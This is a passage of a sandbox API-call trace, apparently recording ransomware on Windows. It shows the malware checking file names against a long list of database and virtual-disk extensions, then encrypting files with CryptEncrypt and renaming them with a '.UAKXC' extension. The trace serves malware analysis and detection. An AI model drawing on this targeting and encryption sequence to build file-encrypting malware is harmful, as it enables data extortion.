(lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".epim") returned 0x0 [0140.805] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".exb") returned 0x0 [0140.805] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".fcd") returned 0x0 [0140.805] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".fdb") returned 0x0 [0140.805] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".fic") returned 0x0 [0140.805] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".fmp") returned 0x0 [0140.805] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".fmp12") returned 0x0 [0140.805] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".fmpsl") returned 0x0 [0140.805] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".fol") returned 0x0 [0140.805] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".fp3") returned 0x0 [0140.805] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".fp4") returned 0x0 [0140.805] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".fp5") returned 0x0 [0140.805] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".fp7") returned 0x0 [0140.805] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".fpt") returned 0x0 [0140.805] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".frm") returned 0x0 [0140.805] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".gdb") returned 0x0 [0140.805] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".grdb") returned 0x0 [0140.805] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".gwi") returned 0x0 [0140.805] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".hdb") returned 0x0 [0140.805] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".his") returned 0x0 [0140.805] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".ib") returned 0x0 [0140.805] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".idb") returned 0x0 [0140.805] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".ihx") returned 0x0 [0140.805] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".itdb") returned 0x0 [0140.806] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".itw") returned 0x0 [0140.806] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".jet") returned 0x0 [0140.806] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".jtx") returned 0x0 [0140.806] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0140.806] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".kexi") returned 0x0 [0140.806] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".kexic") returned 0x0 [0140.806] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".kexis") returned 0x0 [0140.806] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".lgc") returned 0x0 [0140.806] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".lwx") returned 0x0 [0140.806] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".maf") returned 0x0 [0140.806] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".maq") returned 0x0 [0140.806] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".mar") returned 0x0 [0140.806] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".mas") returned 0x0 [0140.806] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".mav") returned 0x0 [0140.806] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".mdb") returned 0x0 [0140.806] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".mdf") returned 0x0 [0140.806] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".mpd") returned 0x0 [0140.806] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".mrg") returned 0x0 [0140.806] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".mud") returned 0x0 [0140.806] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".mwb") returned 0x0 [0140.806] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".myd") returned 0x0 [0140.806] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".ndf") returned 0x0 [0140.806] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".nnt") returned 0x0 [0140.806] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".nrmlib") returned 0x0 [0140.806] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".ns2") returned 0x0 [0140.806] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".ns3") returned 0x0 [0140.806] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".ns4") returned 0x0 [0140.807] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".nsf") returned 0x0 [0140.807] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".nv") returned 0x0 [0140.807] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".nv2") returned 0x0 [0140.807] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".nwdb") returned 0x0 [0140.807] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".nyf") returned 0x0 [0140.807] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".odb") returned 0x0 [0140.807] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".oqy") returned 0x0 [0140.807] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".orx") returned 0x0 [0140.807] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".owc") returned 0x0 [0140.807] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".p96") returned 0x0 [0140.807] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".p97") returned 0x0 [0140.807] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".pan") returned 0x0 [0140.807] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".pdb") returned 0x0 [0140.807] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".pdm") returned 0x0 [0140.807] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".pnz") returned 0x0 [0140.807] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".qry") returned 0x0 [0140.807] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".qvd") returned 0x0 [0140.807] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".rbf") returned 0x0 [0140.807] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".rctd") returned 0x0 [0140.807] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".rod") returned 0x0 [0140.807] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".rodx") returned 0x0 [0140.807] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".rpd") returned 0x0 [0140.807] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".rsd") returned 0x0 [0140.807] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".sas7bdat") returned 0x0 [0140.807] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".sbf") returned 0x0 [0140.807] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".scx") returned 0x0 [0140.808] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".sdb") returned 0x0 [0140.808] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".sdc") returned 0x0 [0140.808] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".sdf") returned 0x0 [0140.808] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".sis") returned 0x0 [0140.808] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".spq") returned 0x0 [0140.808] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".sql") returned 0x0 [0140.808] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".sqlite") returned 0x0 [0140.808] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".sqlite3") returned 0x0 [0140.808] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".sqlitedb") returned 0x0 [0140.808] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".te") returned 0x0 [0140.808] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".temx") returned 0x0 [0140.808] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".tmd") returned 0x0 [0140.808] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".tps") returned 0x0 [0140.808] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".trc") returned 0x0 [0140.808] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".trm") returned 0x0 [0140.808] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".udb") returned 0x0 [0140.808] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".udl") returned 0x0 [0140.808] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".usr") returned 0x0 [0140.808] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".v12") returned 0x0 [0140.808] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".vis") returned 0x0 [0140.808] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".vpd") returned 0x0 [0140.808] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".vvv") returned 0x0 [0140.808] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".wdb") returned 0x0 [0140.808] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".wmdb") returned 0x0 [0140.808] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".wrk") returned 0x0 [0140.809] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".xdb") returned 0x0 [0140.809] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".xld") returned 0x0 [0140.809] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".xmlff") returned 0x0 [0140.809] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".abcddb") returned 0x0 [0140.809] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".abs") returned 0x0 [0140.809] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".abx") returned 0x0 [0140.809] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".accdw") returned 0x0 [0140.809] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".adn") returned 0x0 [0140.809] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".db2") returned 0x0 [0140.809] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".fm5") returned 0x0 [0140.809] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".hjt") returned 0x0 [0140.809] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".icg") returned 0x0 [0140.809] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".icr") returned 0x0 [0140.809] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0140.809] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".lut") returned 0x0 [0140.809] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".maw") returned 0x0 [0140.809] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".mdn") returned 0x0 [0140.809] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".mdt") returned 0x0 [0140.809] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".vdi") returned 0x0 [0140.809] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".vhd") returned 0x0 [0140.809] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".vmdk") returned 0x0 [0140.809] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".pvm") returned 0x0 [0140.809] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".vmem") returned 0x0 [0140.809] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".vmsn") returned 0x0 [0140.809] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".vmsd") returned 0x0 [0140.809] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".nvram") returned 0x0 [0140.809] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".vmx") returned 0x0 [0140.810] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".raw") returned 0x0 [0140.810] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".qcow2") returned 0x0 [0140.810] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".subvol") returned 0x0 [0140.810] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".bin") returned 0x0 [0140.810] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".vsv") returned 0x0 [0140.810] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".avhd") returned 0x0 [0140.810] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".vmrs") returned 0x0 [0140.810] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".vhdx") returned 0x0 [0140.810] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".avdx") returned 0x0 [0140.810] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".vmcx") returned 0x0 [0140.810] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpSrch=".iso") returned 0x0 [0140.810] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.810] WriteFile (in: hFile=0x6c8, lpBuffer=0x397fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x397fc78, lpOverlapped=0x0 | out: lpBuffer=0x397fd70*, lpNumberOfBytesWritten=0x397fc78*=0x20c, lpOverlapped=0x0) returned 1 [0140.811] WriteFile (in: hFile=0x6c8, lpBuffer=0x397fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x397fc7c, lpOverlapped=0x0 | out: lpBuffer=0x397fc80*, lpNumberOfBytesWritten=0x397fc7c*=0xa, lpOverlapped=0x0) returned 1 [0140.811] SetEndOfFile (hFile=0x6c8) returned 1 [0140.811] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.812] ReadFile (in: hFile=0x6c8, lpBuffer=0x4b20000, nNumberOfBytesToRead=0x158, lpNumberOfBytesRead=0x397fc88, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesRead=0x397fc88*=0x158, lpOverlapped=0x0) returned 1 [0140.812] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0xfffffea8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.812] WriteFile (in: hFile=0x6c8, lpBuffer=0x4b20000*, nNumberOfBytesToWrite=0x158, lpNumberOfBytesWritten=0x397fc44, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesWritten=0x397fc44*=0x158, lpOverlapped=0x0) returned 1 [0140.812] CloseHandle (hObject=0x6c8) returned 1 [0140.815] GetProcessHeap () returned 0xea0000 [0140.815] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xef34d0 [0140.815] lstrcpyW (in: lpString1=0xef34d0, lpString2="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn") returned="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" [0140.815] lstrcatW (in: lpString1="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpString2=".UAKXC" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn.UAKXC") returned="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn.UAKXC" [0140.815] MoveFileW (lpExistingFileName="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.infopath.14.1033.hxn"), lpNewFileName="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn.UAKXC" (normalized: "c:\\programdata\\microsoft help\\ms.infopath.14.1033.hxn.uakxc")) returned 1 [0140.816] GetProcessHeap () returned 0xea0000 [0140.816] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef34d0 | out: hHeap=0xea0000) returned 1 [0140.816] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee950 | out: hHeap=0xea0000) returned 1 [0140.816] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6c68 | out: hHeap=0xea0000) returned 1 [0140.816] CryptGenRandom (in: hProv=0xecf568, dwLen=0x20, pbBuffer=0x397fd50 | out: pbBuffer=0x397fd50) returned 1 [0140.816] CryptGenRandom (in: hProv=0xecf568, dwLen=0x8, pbBuffer=0x397fd48 | out: pbBuffer=0x397fd48) returned 1 [0140.816] CryptEncrypt (in: hKey=0xecf820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x200) returned 1 [0140.817] GetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.infopatheditor.14.1033.hxn")) returned 0x2022 [0140.817] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.infopatheditor.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c8 [0140.817] GetLastError () returned 0x0 [0140.817] GetFileSizeEx (in: hFile=0x6c8, lpFileSize=0x397fc88 | out: lpFileSize=0x397fc88*=380) returned 1 [0140.817] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".4dd") returned 0x0 [0140.817] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".4dl") returned 0x0 [0140.817] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".accdb") returned 0x0 [0140.817] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".accdc") returned 0x0 [0140.817] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".accde") returned 0x0 [0140.817] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".accdr") returned 0x0 [0140.818] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".accdt") returned 0x0 [0140.818] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".accft") returned 0x0 [0140.818] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".adb") returned 0x0 [0140.818] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".ade") returned 0x0 [0140.818] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".adf") returned 0x0 [0140.818] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".adp") returned 0x0 [0140.818] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".arc") returned 0x0 [0140.818] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".ora") returned 0x0 [0140.818] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".alf") returned 0x0 [0140.818] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".ask") returned 0x0 [0140.818] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".btr") returned 0x0 [0140.818] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".bdf") returned 0x0 [0140.818] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".cat") returned 0x0 [0140.818] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".cdb") returned 0x0 [0140.818] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".ckp") returned 0x0 [0140.818] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".cma") returned 0x0 [0140.818] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".cpd") returned 0x0 [0140.818] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".dacpac") returned 0x0 [0140.818] 